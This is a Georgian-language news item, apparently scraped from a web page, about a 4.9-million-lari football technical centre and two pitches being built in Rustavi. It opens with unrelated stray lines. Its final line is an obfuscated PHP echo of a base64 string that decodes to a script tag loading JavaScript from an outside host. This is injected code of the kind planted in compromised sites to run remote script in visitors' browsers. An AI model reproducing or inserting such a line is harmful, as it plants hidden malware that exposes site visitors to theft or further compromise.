global distribution
გარე ავეჯი

 ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდი ქალაქ რუსთავში საფეხბურთო ტექნიკური ცენტრისა და ორი საფეხბურთო მოედნის მშენებლობას ასრულებს. ინფორმაციას ამის შესახებ ინფრასტრუქტურის სამინისტრო ავრცელებს.

უწყების ცნობით, სამშენებლო სამუშაოებს საქართველოს მთავრობა 4.9 მილიონ ლარით აფინანსებს.

„მშენებლობის ფარგლებში მოეწყო განათებით აღჭურვილი ორი ხელოვნირსაფარიანი საფეხბურთო მოედანი და ტექნიკური ცენტრი, რომელიც სრულად უზრუნველყოფილი იქნება შესაბამისი ავეჯითა და მოედნების მოვლისთვის საჭირო ტექნიკით. კომპლექსში ასევე მოეწყო გასახდელები, სველი წერტილები და სამეურნეო სათავსები.

200 მაყურებელზე გათვლილი სტადიონი სრულად ადაპტირებულია შეზღუდული შესაძლებლობის მქონე პირებისთვის.

ახალი ინფრასტრუქტურა ხელს შეუწყობს რუსთავსა და რეგიონში სპორტის ხელშეწყობასა და ახალგაზრდებში ჯანსაღი ცხოვრების წესის პოპულარიზაციას“, – ნათქვამია ინფრასტრუქტურის სამინისტროს გავრცელებულ ინფორმაციაში.

191
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");